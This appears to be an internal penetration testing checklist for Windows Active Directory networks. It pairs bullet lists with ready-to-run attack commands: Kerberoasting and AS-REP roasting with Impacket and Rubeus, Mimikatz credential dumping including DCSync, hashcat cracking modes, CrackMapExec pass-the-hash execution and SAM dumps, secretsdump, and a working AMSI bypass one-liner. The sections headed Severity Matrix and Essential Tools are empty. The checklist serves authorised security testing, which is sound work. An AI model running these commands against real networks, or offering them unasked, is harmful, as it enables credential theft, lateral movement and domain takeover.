Internal Penetration Testing Checklist

🔍 Initial Reconnaissance

Network Discovery

• Identify network range (netdiscover, arp-scan)
• Port scanning (nmap -sV -sC)
• Identify domain controllers
• Enumerate DNS records
• LLMNR/NBT-NS poisoning (Responder)
• ARP spoofing potential
• Identify network segmentation

Service Enumeration

• SMB shares enumeration (smbclient, CrackMapExec)
• SNMP enumeration
• LDAP anonymous bind
• RPC enumeration
• Web services on internal hosts
• Database servers (MSSQL, MySQL, Oracle)
• Printers and IoT devices

---

👤 Active Directory Enumeration

Domain Information

• Enumerate domain users (GetADUsers.py)
• Enumerate domain groups
• Enumerate domain computers
• Identify domain admins
• Check password policy
• Enumerate GPOs
• Check for LAPS deployment

BloodHound Collection

# SharpHound
.\SharpHound.exe -c All -d domain.local

Python collector
bloodhound-python -d domain.local -u user -p pass -ns DC_IP -c all

AD Attack Paths

• Identify shortest path to DA
• Find kerberoastable accounts
• Find AS-REP roastable users
• Identify delegation issues
• Find users with DCSync rights
• Check for GPP passwords

---

🎫 Kerberos Attacks

Kerberoasting

# Impacket
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request

Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

• Request TGS for service accounts
• Crack service account hashes
• Identify high-value service accounts

AS-REP Roasting

# Impacket
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP

• Identify users without pre-auth
• Request AS-REP tickets
• Crack obtained hashes

Pass-the-Ticket

• Extract tickets from memory (Mimikatz)
• Inject tickets for lateral movement
• Golden ticket attack
• Silver ticket attack

---

🔑 Credential Harvesting

Memory Extraction

# Mimikatz
sekurlsa::logonpasswords
sekurlsa::tickets /export
lsadump::sam
lsadump::dcsync /domain:domain.local /user:Administrator

Credential Locations

• LSASS memory dump
• SAM/SYSTEM/SECURITY hives
• NTDS.dit extraction
• Cached credentials
• Browser saved passwords
• KeePass databases
• Configuration files

Hash Cracking

# Hashcat
hashcat -m 1000 hashes.txt wordlist.txt  # NTLM
hashcat -m 13100 hashes.txt wordlist.txt # Kerberoast
hashcat -m 18200 hashes.txt wordlist.txt # AS-REP

---

↔️ Lateral Movement

Techniques

• Pass-the-Hash (PTH)
• Pass-the-Ticket (PTT)
• Overpass-the-Hash
• PSExec / SMBExec
• WMI execution
• WinRM / PowerShell Remoting
• RDP hijacking
• DCOM execution

CrackMapExec

# Check admin access
cme smb targets.txt -u user -p pass --local-auth

Execute commands
cme smb target -u admin -H hash -x "whoami"

Dump SAM
cme smb target -u admin -H hash --sam

---

⬆️ Privilege Escalation

Windows PrivEsc

• Unquoted service paths
• Weak service permissions
• AlwaysInstallElevated
• Scheduled tasks
• Autologon credentials
• Token impersonation (Potato attacks)
• UAC bypass
• DLL hijacking

Tools

# WinPEAS
.\winPEASx64.exe

PowerUp
. .\PowerUp.ps1
Invoke-AllChecks

Seatbelt
.\Seatbelt.exe -group=all

---

🏰 Domain Dominance

DCSync Attack

# Mimikatz
lsadump::dcsync /domain:domain.local /all /csv

Impacket
secretsdump.py domain/admin:password@DC_IP

Persistence

• Golden Ticket
• Silver Ticket
• Skeleton Key
• AdminSDHolder abuse
• DCSync backdoor
• Group Policy modification

---

🛡️ Defense Evasion

Techniques

• Disable Windows Defender
• AMSI bypass
• ETW bypass
• Process injection
• Living off the land (LOLBins)
• Fileless malware techniques

AMSI Bypass Examples

# Basic bypass (encoded)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

---

📊 Severity Matrix

---

🛠️ Essential Tools

---

Last updated: 2024